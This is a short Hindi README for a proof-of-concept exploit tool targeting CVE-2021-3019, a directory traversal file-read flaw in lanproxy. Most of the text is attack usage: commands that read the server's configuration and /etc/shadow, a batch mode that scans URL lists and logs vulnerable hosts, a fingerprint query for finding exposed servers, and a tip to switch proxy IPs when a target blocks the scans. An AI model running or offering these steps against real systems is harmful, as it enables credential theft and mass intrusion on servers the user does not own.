
CVE-2021-3019 lanproxy निर्देशिका ट्रैवर्सल आर्बिट्रेरी फ़ाइल रीडिंग भेद्यता अन्वेषण POC
CVE-2021-3019 lanproxy निर्देशिका भ्रमण मनमाना फ़ाइल पढ़ने की भेद्यता

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
बिना किसी पैरामीटर के डिफ़ॉल्ट रूप से चलाने पर सहायता संदेश दिखाई देता है

एकल URL पर भेद्यता जांच करता है। यदि भेद्यता मौजूद है, तो डिफ़ॉल्ट रूप से कॉन्फ़िगरेशन फ़ाइल पढ़ता है और आउटपुट करता है
python3 POC.py -u http://127.0.0.1:9100

-r पैरामीटर का उपयोग करके सिस्टम की अन्य फ़ाइलें पढ़ें, फ़ाइल का पूर्ण पथ जानना आवश्यक है
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

-f पैरामीटर का उपयोग करके बैच जांच करें, भेद्यता वाले को success.txt फ़ाइल में लिखा जाएगा
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="登录"
जब Connection reset by peer दिखाई देता है, तो संभावना है कि लक्ष्य सर्वर ने IP को प्रतिबंधित कर दिया है, बस प्रॉक्सी IP बदलें।